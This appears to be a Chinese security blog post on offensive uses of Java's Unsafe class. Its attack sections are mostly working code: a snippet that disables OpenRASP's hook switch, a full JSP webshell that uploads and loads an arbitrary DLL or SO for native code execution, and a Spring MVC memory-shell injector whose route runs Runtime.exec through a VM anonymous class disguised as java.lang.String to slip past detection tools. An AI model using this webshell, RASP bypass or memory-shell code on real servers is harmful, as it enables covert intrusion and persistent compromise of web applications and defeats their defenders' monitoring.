Java中的Unsafe在安全領域的一些應用總結和復現

newknight發表於2022-03-02

0 前言

unsafe裡面有很多好用的方法,比如allocateInstance可以直接建立例項物件,defineAnonymousClass可以建立一個VM匿名類(VM Anonymous Class),以及直接從記憶體級別修改物件的值。

1 基本使用

首先是獲取Unsafe物件,一般使用反射獲取Unsafe,否則會被Java安全機制攔截,程式碼如下

public static Unsafe getUnsafe() throws Exception{
        Class<?> aClass = Class.forName("sun.misc.Unsafe");
        Constructor<?> declaredConstructor = aClass.getDeclaredConstructor();
        declaredConstructor.setAccessible(true);
        Unsafe unsafe= (Unsafe) declaredConstructor.newInstance();
        return unsafe;
    }

1.1 記憶體級別修改值

這裡首先要提到的是,在jvm中,對例項的Field進行了有規律的儲存,具體可見JVM相關知識,而通過一個偏移量可以從記憶體中找到相應的Field值。在Unsafe中獲取偏移量的方法是staticFieldOffset(Field var1)和objectFieldOffset(Field var1)這兩個方法,輸入一個Field物件後,會返回該Field在其相應的類中的記憶體偏移量是多少。通過獲得的偏移量可進一步呼叫putInt、putLong、putObject等方法對例項的field進行修改。

例如:

package com.bitterz.unsafe;

import sun.misc.Unsafe;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;

public class UnsafeTest {
    private int a = 1;
    private String string = "whoami";
    public UnsafeTest(){}

    public void test(){    }

    public static void main(String[] args) throws Exception {
        Unsafe unsafe = getUnsafe();
        UnsafeTest unsafeTest = new UnsafeTest();
        
        // 修改int
        Field f = Class.forName("com.bitterz.unsafe.UnsafeTest").getDeclaredField("a");
        long l = unsafe.objectFieldOffset(f);
        unsafe.putInt(unsafeTest, l, 9999);
        System.out.println(unsafeTest.a);

        // 修改string
        Field f2 = Class.forName("com.bitterz.unsafe.UnsafeTest").getDeclaredField("string");
        long l2 = unsafe.objectFieldOffset(f2);
        unsafe.putObject(unsafeTest, l2, "bitterz");
        System.out.println(unsafeTest.string);
    }

    public static Unsafe getUnsafe() throws Exception{
        Class<?> aClass = Class.forName("sun.misc.Unsafe");
        Constructor<?> declaredConstructor = aClass.getDeclaredConstructor();
        declaredConstructor.setAccessible(true);
        Unsafe unsafe= (Unsafe) declaredConstructor.newInstance();
        return unsafe;
    }
}

其輸出結果為

但對final和static修飾的field這種修改方法無效。另外還可以通過偏移量使用getInt()、getObject()等方法獲取例項的field值,這種方法也可以作為反射被限制時的一種繞過。

1.2 建立物件

Unsafe中有個allocateInstance方法,可以無視構造方法,直接利用類物件構建例項,這種方法往往能夠減少反射建立例項時可能遇到的各種阻礙,比如類的依賴關係。

比如前面建立Unsafe時使用了反射,不能直接進行建立,那麼可以使用unsafe進行建立(只是為了演示。。)

1.3 建立VM Anonymous Class

VM Anonymous Class並不等同於匿名類,這種類具有以下幾個特點(摘自https://paper.seebug.org/1785):

1、class名可以是已存在的class的名字,比如java.lang.File,即使如此也不會發生任何問題,java的動態編譯特性將會在記憶體中生成名如 java.lang.File/13063602@38ed5306的class。  ---將會使類名極具欺騙性
2、該class的classloader為null。  ---在java中classloader為null的為來自BootstrapClassLoader的class,往往會被認定為jdk自帶class
3、在JVM中存在大量動態編譯產生的class(多為lamada表示式生成),這種class均不會落盤,所以不落盤並不會屬於異常特徵。 
4、無法通過Class.forName()獲取到該class的相關內容。 ---嚴重影響通過反射排查該類安全性的檢測工具
5、在部分jdk版本中,VM Anonymous Class甚至無法進行restransform。 ---這也就意味著我們無法通過attach API去修復這個惡意類
6、該class在transform中的className將會是它的模板類名。 ---這將會對那些通過attach方式檢測記憶體馬的工具造成極大的誤導性

使用方法如下

defineAnonymousClass方法的第一個引數隨便傳入一個類物件即可,第二個引數需要傳入一個類的位元組碼,這裡使用javassist簡單一點。第三個引數設定為null即可。

執行後得到一個類物件,通過newInstance獲取例項,再呼叫了匿名類的toString方法,彈個計算器。而後輸出匿名類的類名和Unsafe的類名進行對比,可見,用defineAnonymousClass建立的類名後面,會有"/xxxxxxxx",這裡也算一個特徵,但通過Class.forName是無法獲取到這個類的,所以下面報錯了。

用attach的方式,看看對該類的檢測,之前寫過rasp相關的筆記,所以直接拿過來用

transform裡面拿到到該類後,直接報錯了,看了一下報錯日誌,實際上就是在transform中返回位元組碼時出問題了,因為前面也說了在部分jdk中,VM AnonymousClass是不能被retransform的,我這裡用的是jdk1.8u40。但是直接結束程式有點不太好,例如插入記憶體馬後,目標使用attach機制來掃描jvm中載入的類,此時直接導致Web程式崩潰,業務不得提刀來殺安全:) 這個點用於記憶體馬可能要慎重一下。

2 利用姿勢

2.1 修改值以關閉RASP等防禦措施

前面提到了,通過Unsafe可以直接修改值,因此在遇到目標有RASP得情況下,可以考慮修改RASP的開關


try {
    Class clazz = Class.forName("com.baidu.openrasp.HookHandler");
    Unsafe unsafe = getUnsafe();
    InputStream inputStream = clazz.getResourceAsStream(clazz.getSimpleName() + ".class");
    byte[] data = new byte[inputStream.available()];
    inputStream.read(data);
    Class anonymousClass = unsafe.defineAnonymousClass(clazz, data, null);
    Field field = anonymousClass.getDeclaredField("enableHook");
    unsafe.putObject(clazz, unsafe.staticFieldOffset(field), new AtomicBoolean(false));
    } catch (Exception e) {
    }

或者使用rebeyond師傅提到的方法,手動構建insturmentation物件,然後對執行命令的類去掉RASP插樁程式碼。

2.2 建立NativeLibrary物件實現webshell

這裡的思路來自於SummerSec師傅的文章,通過java.lang.ClassLoader$NativeLibrary#load(String, Boolean)方法,載入一個dll檔案,而dll檔案中可以實現各種攻擊手段,例如上傳了一個jsp檔案,只用於載入dll,而不同的dll實現了內網穿透、反彈Shell、木馬和執行命令等功能,攻擊時上傳對應dll檔案即可。

借鑑https://github.com/SummerSec/Loader/blob/main/AddDllDemo.jsp ,又稍微改了一下程式碼,把上傳檔案和載入dll融合到了一個jsp裡面

<%@page pageEncoding="utf-8"%>
<input type="file" id="fielinput" />
<img id="txshow" style="width:100px;height:100px;"/>
<br/>解析之後的base64資料:<br/>
<p id="data"></p>

<head>
    <meta charset="utf-8">
</head>

<form action="http://127.0.0.1:8080/test/AddDllDemo.jsp" method="POST">
    <input type="text" style="width:1300px;height:100px;font-size:30px" name="p"/>
    <input type="submit" value="提交"/>
</form>

<script type="text/javascript">

var input = document.getElementById("fielinput");
input.addEventListener('change', readFile, false);
function readFile() {
   var file = this.files[0];
    var reader = new FileReader(); // 返回一個新的FileReader函式
    reader.readAsDataURL(file);
    reader.onload = function (e) {
        txshow.src = this.result;
        document.getElementById("data").innerText=this.result.substring(this.result.indexOf(',')+1);
    }
}
</script>>


<%
if(request.getMethod().equals("GET")){
    
}else{
    String p = request.getParameter("p");
    String t = request.getServletContext().getRealPath("/");
    java.io.PrintWriter outp = response.getWriter();
    outp.println("WebRootPath:");
    outp.println(t);
    t = request.getServletPath();
    outp.println("ServletPath:");
    outp.println(t);
    t = (new java.io.File(".").getAbsolutePath());
    outp.println("WebServerPath:");
    outp.println(t);
    java.util.Random random = new java.util.Random(System.currentTimeMillis());
    outp.println("if Dynamic Link Library will be auto load in uploading !!!");
    t = System.getProperty("os.name").toLowerCase();
    if (t.contains("windows")) {
        t = "C:/Windows/temp/dm" + random.nextInt(10000000) + "1.dll";
    }else {
        t = "/tmp/dm" + random.nextInt(10000000) + "1.so";
    }
    if (p != null) {
        try {
            java.io.FileOutputStream fos = new java.io.FileOutputStream(new java.io.File(t));
            fos.write(D(p));
            fos.close();
            N(t);
            outp.println("Dynamic Link Library is uploaded, and the path is: " + t);
            outp.println("load uploaded success !!!");
        } catch (Exception e) {
            outp.println(e.getMessage());
        }
    }
    outp.flush();
    outp.close();
}

%>

<%!
    private void N(String t) throws Exception {
        Object o;
        Class a = Class.forName("java.lang.ClassLoader$NativeLibrary");
        try {
            java.lang.reflect.Constructor c = a.getDeclaredConstructor(new Class[]{Class.class,String.class,boolean.class});
            c.setAccessible(true);
            o = c.newInstance(Class.class,t,true);
        }catch (Exception e){
            Class u = Class.forName("sun.misc.Unsafe");
            java.lang.reflect.Constructor<?> c = u.getDeclaredConstructor();
            c.setAccessible(true);
            sun.misc.Unsafe un = (sun.misc.Unsafe)c.newInstance();
            o =  un.allocateInstance(a);
        }
        java.lang.reflect.Method method = o.getClass().getDeclaredMethod("load", String.class, boolean.class);
        method.setAccessible(true);
        method.invoke(o, t, false);
    }

    private byte[] D(String p) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[])(clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), p));
        } catch (Exception var5) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[])(decoder.getClass().getMethod("decode", String.class).invoke(decoder, p));
        }
    }
%>

瀏覽器訪問AddDllDemo.jsp後,選擇dll檔案,並複製base64值到文字框中,點選提交

成功彈出計算器

使用Unsafe去建立NativeLibrary的有點在於可以減少在java層面的呼叫,直接一個load方法就能實現native層面的程式碼執行,可以繞過RASP或終端軟體對webshell的查殺,以及java層面執行命令時被攔截的可能。

目前這種做法有個缺點在於DLL檔案必須落地,顯然落地就有可能被檔案監控察覺到。另外實現這種做法的還有ClassLoader#loadLibraryClassLoader#loadLibrary0,利用反射即可實現不再贅述。期待大師傅們搞出無檔案落地的姿勢!

2.3 匿名的記憶體馬

前面提到了使用Unsafe.defineAnonymousClass方法可以建立一個VM Anonymous Class,基於其各種特點,可以讓記憶體馬隱藏的更深

在springmvc中,插入servlet記憶體馬時,只需要傳入方法名和惡意類的例項物件,剛好適合這種Anonymous Class,pom.xml設定如下

<dependency>
    <groupId>org.springframework</groupId>
    <artifactId>spring-web</artifactId>
    <version>4.2.6.RELEASE</version>
</dependency>
<dependency>
    <groupId>org.springframework</groupId>
    <artifactId>spring-webmvc</artifactId>
    <version>4.2.6.RELEASE</version>
</dependency>
<dependency>
    <groupId>org.springframework</groupId>
    <artifactId>spring-context</artifactId>
    <version>4.2.6.RELEASE</version>
</dependency>
<dependency>
    <groupId>org.springframework</groupId>
    <artifactId>spring-test</artifactId>
    <version>4.2.6.RELEASE</version>
</dependency>
<dependency>
    <groupId>org.springframework</groupId>
    <artifactId>spring-jdbc</artifactId>
    <version>4.2.6.RELEASE</version>
</dependency>
<dependency>
    <groupId>org.javassist</groupId>
    <artifactId>javassist</artifactId>
    <version>3.19.0-GA</version>
</dependency>

在spring_mvc中寫個controller來注入,示例程式碼如下:

@ResponseBody
@RequestMapping(value = "/index", method = RequestMethod.GET)
public String index(HttpServletRequest request, HttpServletResponse response) throws Exception {
    // 準備unsafe和匿名類
    Class<?> aClass = Class.forName("sun.misc.Unsafe");
    Constructor<?> declaredConstructor = aClass.getDeclaredConstructor();
    declaredConstructor.setAccessible(true);
    Unsafe unsafe= (Unsafe) declaredConstructor.newInstance();
    ClassPool classPool = ClassPool.getDefault();
    CtClass ctClass = classPool.makeClass("java.lang.String");
    CtMethod toString = CtMethod.make("public String toString(){java.lang.Runtime.getRuntime().exec(\"calc\");return null;}", ctClass);
    toString.setName("toString");
    ctClass.addMethod(toString);
    byte[] bytes = ctClass.toBytecode();
    Class<?> anonymousClass = unsafe.defineAnonymousClass(File.class, bytes, null);

    // 插入記憶體馬
    WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
    // 1. 從當前上下文環境中獲得 RequestMappingHandlerMapping 的例項 bean
    RequestMappingHandlerMapping mappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);
    AbstractHandlerMethodMapping abstractHandlerMethodMapping = context.getBean(AbstractHandlerMethodMapping.class);
    Method method = Class.forName("org.springframework.web.servlet.handler.AbstractHandlerMethodMapping").getDeclaredMethod("getMappingRegistry");
    method.setAccessible(true);
    Object  mappingRegistry = (Object) method.invoke(abstractHandlerMethodMapping);
    Field field = Class.forName("org.springframework.web.servlet.handler.AbstractHandlerMethodMapping$MappingRegistry").getDeclaredField("urlLookup");
    field.setAccessible(true);
    Map urlLookup = (Map) field.get(mappingRegistry);
    Iterator urlIterator = urlLookup.keySet().iterator();
    String injectUrlPath = "/malicious"; // 插入的url
    while (urlIterator.hasNext()){
        String urlPath = (String) urlIterator.next();
        if (injectUrlPath.equals(urlPath)){
            System.out.println("URL已存在");
            return "exist";
        }
    }

    // 2. 通過反射獲得自定義 controller 中唯一的 Method 物件
    Method method2 = InjectAnonymousClass.class.getMethod("toString");

    // 3. 定義訪問 controller 的 URL 地址
    PatternsRequestCondition url = new PatternsRequestCondition(injectUrlPath);
    // 4. 定義允許訪問 controller 的 HTTP 方法(GET/POST)
    RequestMethodsRequestCondition ms = new RequestMethodsRequestCondition();
    // 5. 在記憶體中動態註冊 controller
    RequestMappingInfo info = new RequestMappingInfo(url, ms, null, null, null, null, null);
    //        InjectAnonymousClass InjectAnonymousClass = new InjectAnonymousClass("aaa");
    Object o = anonymousClass.newInstance();
    mappingHandlerMapping.registerMapping(info, o, method2);

    return "injected!";  // 這裡根據註解會自動返回index.html
}

啟動專案,然後訪問該controller對應的url,結果如下

注入成功,訪問/malicious

由於惡意程式碼裡面只寫了彈計算器,並沒有寫返回語句,所以tomcat尋找malicious.jsp會返回404。除錯模式下看一下對該url的描述

只有在beanType處顯示類名為java.lang.String/179284069,其它地方都顯示為java.lang.String。匿名類的類名又可以隨意設定,所以稍加修飾即可以假亂真,比如先拿到org.springframework.web.servlet.handler.AbstractHandlerMethodMapping$MappingRegistry,遍歷其中,隨便找一個controller的類名和方法名,然後回顯一下,再給惡意類寫個一樣的package和方法名,url則根據Web應用的規律自己編一個,這樣的話,還是能夠欺騙到根據package和方法名判斷的檢測方法,另外VM Anonymous Class沒辦法獲取到位元組碼,所以也能逃過一劫。

2.4 shellcode和instrumentation物件構建

Unsafe類還能對記憶體進行操作,在rebeyond師傅的文章-java記憶體攻擊技術漫談中有大量應用,最終可以通過記憶體級別的操作,直接構建instrumentation物件進而修改jvm中的java程式碼;或者執行shellcode,從而繞過RASP實現命令執行、檔案讀寫等操作。

3 總結

Unsafe在java攻擊層面屬實非常有用,而其正常使用也非常廣泛,例如gson反序列化時,直接使用allocateInstance建立物件,無視建構函式的複雜。Unsafe還有很多其它功能,不夠安全人員可能用的比較少,我也借用一下這張傳的最廣泛的圖:)

參考:

https://paper.seebug.org/1785

https://tttang.com/archive/1436/

https://www.cnblogs.com/rebeyond/p/15162264.html

相關文章